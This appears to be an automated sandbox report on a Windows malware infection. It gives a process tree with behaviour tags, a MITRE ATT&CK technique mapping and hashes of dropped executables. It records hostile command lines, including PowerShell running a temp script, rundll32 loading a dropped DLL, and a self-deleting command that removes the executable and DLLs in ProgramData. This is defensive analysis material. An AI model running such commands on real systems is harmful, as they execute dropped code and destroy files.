                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:3104
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:2988
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:5092
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:4448
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                    7⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:4656
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                      8⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks computer location settings
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      PID:4832
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:6100
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        8⤵
                                                                                                          PID:4960
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:4116
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            8⤵
                                                                                                              PID:4416
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:4216
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:5808
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso9ABC.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:4792
                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4716
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                    1⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1060
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                      2⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Checks processor information in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4128
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:3192
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:4296
                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                    1⤵
                                                                                                    • Enumerates connected drives
                                                                                                    • Drops file in Program Files directory
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2168
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 739BFD6D50F36D6597319B0909F7B23C C
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:6024
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding A10428CE9386C42C8A81437DE64FAC24
                                                                                                      2⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5756
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                        3⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5336
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 0E1546BF67EC1C7E1F488092FABCAA8C E Global\MSI0000
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5816
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4172
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                      PID:4832
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:5620
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\A5B2.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\A5B2.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4924
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                        2⤵
                                                                                                          PID:5976
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout 1
                                                                                                            3⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:5080
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A5B2.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\A5B2.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks processor information in registry
                                                                                                          PID:576
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im A5B2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A5B2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                            3⤵
                                                                                                              PID:5900
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im A5B2.exe /f
                                                                                                                4⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5444
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /t 6
                                                                                                                4⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:4720
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 1488
                                                                                                            2⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            • Program crash
                                                                                                            PID:4464
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AAC4.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\AAC4.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5436
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AAC4.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AAC4.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4288
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AAC4.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AAC4.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5208
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B1CA.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\B1CA.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:5256
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 736
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5744
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 748
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1376
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 752
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5572
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 888
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5808
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1188
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5392
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1224
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:2060
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1332
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:3492
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1420
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5976
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1348
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:208
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1252
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5040
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1296
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4576
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1404
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4836
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1436
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:2956
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1508
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5640
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1620
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4716
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1684
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5584
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1724
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:2112
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1836
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:6112
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1908
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4480
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2020
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4972
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2004
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4392
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1996
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1980
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2028
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5232
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2016
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4544
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1948
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4180
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2012
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4476
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2008
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1204
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1864
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4960
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1748
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5648
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1964
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:904
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1740
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5240
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1744
                                                                                                            2⤵
                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                            • Program crash
                                                                                                            PID:5176
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:4416
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5240
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4508
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5784
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4460
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:6132
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:5288
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:1012
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:5592
                                                                                                                    • C:\Windows\System32\slui.exe
                                                                                                                      C:\Windows\System32\slui.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:5240
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:4632
                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                          1⤵
                                                                                                                            PID:4276
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                            1⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:4236
                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                            PID:4992
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                            1⤵
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:5048
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                            1⤵
                                                                                                                            • Modifies registry class
                                                                                                                            PID:4960
                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4960 -s 2728
                                                                                                                              2⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5824
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                            1⤵
                                                                                                                            • Modifies registry class
                                                                                                                            PID:5240
                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 5240 -s 2004
                                                                                                                              2⤵
                                                                                                                              • Program crash
                                                                                                                              PID:2784
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                            1⤵
                                                                                                                              PID:956
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:1052

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                              Execution

                                                                                                                              Scheduled Task

                                                                                                                              1
                                                                                                                              T1053

                                                                                                                              Persistence

                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                              1
                                                                                                                              T1060

                                                                                                                              Scheduled Task

                                                                                                                              1
                                                                                                                              T1053

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Privilege Escalation

                                                                                                                              Scheduled Task

                                                                                                                              1
                                                                                                                              T1053

                                                                                                                              Defense Evasion

                                                                                                                              Disabling Security Tools

                                                                                                                              2
                                                                                                                              T1089

                                                                                                                              Modify Registry

                                                                                                                              5
                                                                                                                              T1112

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Install Root Certificate

                                                                                                                              1
                                                                                                                              T1130

                                                                                                                              Credential Access

                                                                                                                              Credentials in Files

                                                                                                                              4
                                                                                                                              T1081

                                                                                                                              Discovery

                                                                                                                              Software Discovery

                                                                                                                              1
                                                                                                                              T1518

                                                                                                                              Query Registry

                                                                                                                              5
                                                                                                                              T1012

                                                                                                                              System Information Discovery

                                                                                                                              6
                                                                                                                              T1082

                                                                                                                              Security Software Discovery

                                                                                                                              1
                                                                                                                              T1063

                                                                                                                              Peripheral Device Discovery

                                                                                                                              2
                                                                                                                              T1120

                                                                                                                              Remote System Discovery

                                                                                                                              1
                                                                                                                              T1018

                                                                                                                              Collection

                                                                                                                              Data from Local System

                                                                                                                              4
                                                                                                                              T1005

                                                                                                                              Command and Control

                                                                                                                              Web Service

                                                                                                                              1
                                                                                                                              T1102

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
                                                                                                                                MD5

                                                                                                                                50a833d4031bc5d73968bb09985c9af1

                                                                                                                                SHA1

                                                                                                                                0cadd71afeb846c01aa0bbe7534307a06fc924db

                                                                                                                                SHA256

                                                                                                                                db871a0f3c13504b0dd296a91bd03132a031ed12c8449c3f2cdde438a8615197

                                                                                                                                SHA512

                                                                                                                                a6b9d2b34c30bce4752b3fea27b7bd7a76104ce3b5f2c6ebaacb33682c05ae4f2eaeb061ddd6beb34d2633b20cce341f7a1a5ed9835d12b397cd0a686d413735

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11-db21e-6a1-9df8d-1a3bef7129cc5\Kenessey.txt
                                                                                                                                MD5

                                                                                                                                97384261b8bbf966df16e5ad509922db

                                                                                                                                SHA1

                                                                                                                                2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                                SHA256

                                                                                                                                9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                                SHA512

                                                                                                                                b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11-db21e-6a1-9df8d-1a3bef7129cc5\Kozhocapeku.exe
                                                                                                                                MD5

                                                                                                                                1f19330a59c0369f5d0b77b02f275568

                                                                                                                                SHA1

                                                                                                                                0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                                                SHA256

                                                                                                                                f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                                                SHA512

                                                                                                                                3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11-db21e-6a1-9df8d-1a3bef7129cc5\Kozhocapeku.exe
                                                                                                                                MD5

                                                                                                                                1f19330a59c0369f5d0b77b02f275568

                                                                                                                                SHA1

                                                                                                                                0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                                                SHA256

                                                                                                                                f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                                                SHA512

                                                                                                                                3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11-db21e-6a1-9df8d-1a3bef7129cc5\Kozhocapeku.exe.config
                                                                                                                                MD5

                                                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                SHA1

                                                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                SHA256

                                                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                SHA512

